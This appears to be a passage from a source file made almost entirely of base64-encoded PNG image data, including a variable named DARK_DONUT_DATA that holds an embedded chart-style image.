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'
DARK_DONUT_DATA = b'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